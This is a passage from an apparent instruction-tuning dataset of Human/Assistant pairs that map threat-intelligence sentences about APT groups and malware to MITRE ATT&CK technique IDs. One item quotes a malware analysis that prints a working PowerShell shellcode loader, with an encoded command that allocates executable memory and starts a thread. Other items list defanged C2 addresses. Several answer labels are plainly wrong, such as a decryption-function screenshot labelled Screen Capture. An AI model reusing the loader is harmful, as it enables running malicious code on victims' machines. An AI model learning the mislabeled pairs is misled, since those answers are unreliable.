ID from MITRE ATT&CK framework.,CHOPSTICK is capable of performing remote file transmission.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,* Uploading malware or tools to a location accessible to a victim network to enable Ingress Tool Transfer.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FatDuke has been regularly repacked by its operators to create large binaries and evade detection.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has used PowerShell to execute malicious code.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gazer performs thread execution hijacking to inject its orchestrator into a running thread from a remote process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA551 has used mshta.exe to execute malicious payloads.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Analysis of their configurations show that the C2 servers used both fully-qualified domain names and IP addresses### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Doki’s container was configured to bind the host root directory.### Assistant: T1611: Escape to Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot has the ability to create scheduled tasks for persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Unlike Keylogging, this technique focuses specifically on API functions that include parameters that reveal user credentials.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kerrdown can encrypt, encode, and compress multiple layers of shellcode.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.### Assistant: T1606: Forge Web Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Code snippet of the obfuscated document After deobfuscation, we can see that the payload is written in the Perl programming language### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FinFisher queries Registry values as part of its anti-sandbox checks.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They combine reconnaissance of GPO (Group Policy Object management for execution) with digitally-signed malware to avoid detection or blocking during their infection phases### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For attacks attempting to saturate the providing network, see Network Denial of Service.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may target system-wide logging or just that of a particular application.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GALLIUM used a modified version of NBTscan to identify available NetBIOS name servers over the network as well as ping to identify remote systems.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gathering this information may reveal opportunities for other forms of reconnaissance or Search Open Websites/Domains, establishing operational resources or Obtain Capabilities, and/or initial access or Hardware Additions.### Assistant: T1591: Gather Victim Org Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RATANKBA performs a reflective DLL injection using a given pid.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Explosive has collected the username from the infected host.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork used PowerSploit to download payloads, run a reverse shell, and execute malware on the victim's machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gazer can establish persistence by creating a .lnk file in the Start menu.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Trickbot uses this encrypted module to scan the network and steal relevant network information.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,creates a backdoor through which remote attackers can steal system information.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GALLIUM used a modified version of Mimikatz along with a PowerShell-based Mimikatz to dump credentials on the victim machines.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These scripts can vary based on operating system and whether applied locally or remotely.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.### Assistant: T1565: Data Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attack Lifecycle Initial Compromise APT40 has been observed leveraging a variety of techniques for initial compromise, including web server exploitation, phishing campaigns delivering publicly available and custom backdoors, and strategic web compromises### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 7 shows just how similar these two batch scripts are with several of the headers being exactly the same and a majority of the commands being the same with the Helminth commands having the 2>&1 suffix to include command errors with the output### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWRUNER can execute commands from its C2 server.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Interactive shells (cmd.exe, /bin/bash, etc) can be opened remotely### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has also renamed a Cobalt Strike beacon payload to install_flashplayers.exe.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages .### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BITS upload functionalities can also be used to perform Exfiltration Over Alternative Protocol.### Assistant: T1197: BITS Jobs" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro can obtain C2 information from Google Docs.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Compromised profiles may be leveraged during other phases of the adversary lifecycle, such as during Initial Access .### Assistant: T1586: Compromise Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Egregor has used an encoded PowerShell command by a service created by Cobalt Strike for lateral movement.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot uses brute-force attack against RDP with rdpscanDll module.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The discovery modules used with Duqu can collect information on accounts and permissions.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackOasis's first stage shellcode contains a NOP sled with alternative instructions that was likely designed to bypass antivirus tools.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,njRAT has used port 1177 for HTTP C2 communications.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE can encrypt C2 communications.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group has also used malware to scan for removable drives.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This group was observed using tactics such as registering typosquatting domains for security or technology vendors, abusing open-source penetration testing tools, and leveraging novel file types as anti-analysis techniques### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SombRAT has the ability to download and execute additional payloads.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can encrypt and pack malicious payloads.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Proton zips up files before exfiltrating them.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lucifer has the ability to identify the username on a compromised host.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Phishing emails with political themes were used in the majority of the observed attack emails### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HotCroissant has attempted to install a scheduled task named “Java Maintenance64” on startup to establish persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER has created forged Kerberos Ticket Granting Ticket and Ticket Granting Service tickets to maintain administrative access.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has used Volume Shadow Copy to access credential information from NTDS.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WMIC is a good tool for managing windows hosts and is widely favored by desktop administrators### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Doki has searched for the current process’s PID.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MegaCortex was used to kill endpoint security processes.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cuba can discover shared resources using the NetShareEnum API call.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CrossRAT is capable of taking screen captures.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may buy, lease, or rent infrastructure that can be used during targeting.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can identify the system time on a targeted host.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork has added the path of its second-stage malware to the startup folder to achieve persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Code comparison between the default batch script issued by Poison Frog’s C2 and a batch script received by the Helminth Trojan Webshells The data dump included several different webshells apparently used by OilRig to interact with compromised servers### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Orz can execute commands with JavaScript.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TinyZBot can install as a Windows service for persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Then, they are using the process hollowing technique to hide the execution of these tools inside of the original Microsoft vbc.exe (VisualBasic Compiler) process### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MirageFox can gather the username from the victim’s machine.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week.### Assistant: T1591: Gather Victim Org Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 uses the Invoke-Obfuscation framework to obfuscate their PowerShell and also performs other code obfuscation.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,P8RAT can download additional payloads to a target system.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete can download additional files for execution on the victim’s machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ABK has the ability to download files from C2.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork copied all targeted files to a directory called index that was eventually uploaded to the C&C server.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Revenge RAT has the ability to upload and download files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM has attempted to lure victims into opening e-mail attachments to execute malicious code.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Different ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.### Assistant: T1491: Defacement" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The screen capture below shows the decryption function.It then calls the StartAndPatchRegAsm function.This function tries to find the original Microsoft RegAsm executable path### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has used macros to verify if a mouse is connected to a compromised machine.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has side-loaded its malicious DLL file.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SodaMaster can use ""stackstrings"" for obfuscation.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Files on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app .### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By running SSH on the server in a compromised network, attackers can come back to the network whenever they want### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Felismus checks for processes associated with anti-virus vendors.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Get2 has the ability to identify the current username of an infected host.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used a Word Template, Normal.dotm, for persistence.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Several Lazarus Group malware families collect information on the type and version of the victim OS, as well as the victim computer name and CPU information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BoomBox has gained execution through user interaction with a malicious file.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The macro contains a PowerShell script to persist in the ""Run"" registry key, ""KCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding"".### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For user level permissions, adversaries can insert malicious commands into ~/.bash_profile, ~/.bash_login, or ~/.profile which are sourced when a user opens a command-line interface or connects remotely.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This process is sometimes referred to as Bring Your Own Vulnerable Driver .### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound has attempted to lure victims into opening malicious links embedded in emails.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has queried the registry to detect recent PuTTY sessions.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PlayList.vbs contains the obfuscated codes, which it executes after decrypting the obfuscations.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In the example above, the “spp.exe” executable would be added to an auto-run registry key at: SOFTWARE\Microsoft\Windows\CurrentVersion\Run\iexplore Many of the Fetch samples attempted to obfuscate their functionality by encrypting their embedded strings with AES using the same key “agkrhfpdbvhdhrkj”; however, the loader’s main goal involved running the following command:/c powershell -window hidden -EncodedCommand JAAwAG8AOABlACAAPQAgACcAJABmADkAQgAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsA<snip>The base64 encoded command decodes to the following:$0o8e = '$f9B = ''[DllImport(""kernel32.dll"")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport(""kernel32.dll"")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport(""msvcrt.dll"")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $f9B -Name ""Win32"" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = <shellcode REDACTED for brevity>;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$rJr=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($rJr.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$rJr,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($0o8e));$DKn = ""-enc "";if([IntPtr]::Size -eq 8){$b32 = $env:SystemRoot + ""\syswow64\WindowsPowerShell\v1.0\powershell"";iex ""& $b32 $DKn $e""}else{;iex ""& powershell $DKn $e"";}The decoded command above builds a buffer that it uses to store shellcode and creates a thread to execute it### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bisonal deletes its dropper and VBS scripts from the victim’s machine.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkComet has a keylogging capability.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gold Dragon collects endpoint information using the systeminfo command.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT33 has used a variety of publicly available tools like LaZagne to gather credentials.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Smoke Loader downloads a new version of itself once it has installed.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via PowerSploit.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Siloscape has decrypted the password of the C2 server with a simple byte by byte XOR.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNBURST collected information from a compromised host.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Babuk has the ability to enumerate files on a targeted system.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Unlike DLL Search Order Hijacking, the search order differs depending on the method that is used to execute the program.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leafminer used a tool called MailSniper to search through the Exchange server mailboxes for keywords.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has used CVE-2015-4902 to bypass security features.### Assistant: T1211: Exploitation for Defense Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LightNeuron is capable of starting a process using CreateProcess.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Delays may also be based on waiting for specific victim conditions to be met or employ scheduled Multi-Stage Channels to avoid analysis and scrutiny.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAFNIUM has downloaded malware and tools--including Nishang and PowerCat--onto a compromised host.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kobalos decrypts strings right after the initial communication, but before the authentication process.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RogueRobin uses Windows Script Components.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Avaddon has collected information about running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After the database is unlocked, these credentials may be copied to memory.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can deobfuscate shellcode using a rolling XOR and decrypt metadata from Beacon sessions.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ryuk can remotely create a scheduled task to execute itself on a system.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has used VBS code on victims’ systems.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SHOTPUT uses netstat to list TCP connection status.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GALLIUM ensured each payload had a unique hash, including by using different types of packers.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may copy files laterally between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with SMB/Windows Admin Shares or Remote Desktop Protocol.### Assistant: T1570: Lateral Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JCry has used cmd.exe to launch PowerShell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 executed shellcode to identify the name of the infected host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This could be done to blend traffic patterns with normal activity or availability.### Assistant: T1029: Scheduled Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RogueRobin enumerates running processes to search for Wireshark and Windows Sysinternals suite.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory.### Assistant: T1080: Taint Shared Content" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication.### Assistant: T1187: Forced Authentication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,attachedTemplate.dotm xxx 11/15/18 05:35 11/15/18 05:35 109.248.148[.]42 Table 2 Remote templates downloaded by Dear Joohn delivery documents As seen in Table 1, the delivery documents accessed their respective remote templates from four C2 servers at the following IP addresses: 185.203.118[.]198 145.249.105[.]165 188.241.58[.]170  109.248.148[.]42 These initial C2 IP addresses not only hosted the remote templates that subsequently load the first-stage Zebrocy or Cannon payloads, but the IP addresses also hosted the C2 server for the first-stage payloads themselves### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KeyBoy uses PowerShell commands to download and execute payloads.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HotCroissant has the ability to upload a file from the command and control server to the victim machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also subsequently log off and/or reboot boxes to set malicious changes into place.### Assistant: T1531: Account Access Removal" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NotPetya searches for files ending with dozens of different file extensions prior to encryption.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used net localgroup administrators to identify accounts with local administrative rights.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HARDRAIN binds and listens on port 443 with a FakeTLS method.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot has spread through emails with malicious links.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Valak has the ability to identify the domain and the MAC and IP addresses of an infected machine.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BitPaymer can set values in the Registry to help in execution.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Elderwood has delivered zero-day exploits and malware to victims by injecting malicious code into specific public Web pages visited by targets within a particular sector.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This file issued a GET request to download a malicious file from: hxxp://94.23.172.164/dupdatechecker.doc### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leafminer has obtained and used tools such as LaZagne, Mimikatz, PsExec, and MailSniper.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Microsoft Connection Manager Profile Installer is a command-line program used to install Connection Manager service profiles.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The toolset used by the Magic Hound campaign was an assortment of custom tools, as well as open sourced tools available to the general public### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged profiling DLL to be loaded into each .NET process that loads the Common Language Runtime .### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerShower has added a registry key so future powershell.exe instances are spawned off-screen by default, and has removed all registry entries that are left behind during the dropper process.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GeminiDuke uses HTTP and HTTPS for command and control.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After the payload is launched, the shellcode runs the following commands to prevent Microsoft Word from showing a recovery dialog: Lastly, the shellcode overwrites the malicious file with a decoy document related to the Indian defense forces’ pay scale / matrix (Figure 3), displays it to the user and terminates the exploited instance of Microsoft Word### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, ""overpassing the hash"" involves using a NTLM password hash to authenticate as a user Pass the Hash while also using the password hash to create a valid Kerberos ticket.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Javali has been delivered as malicious e-mail attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from 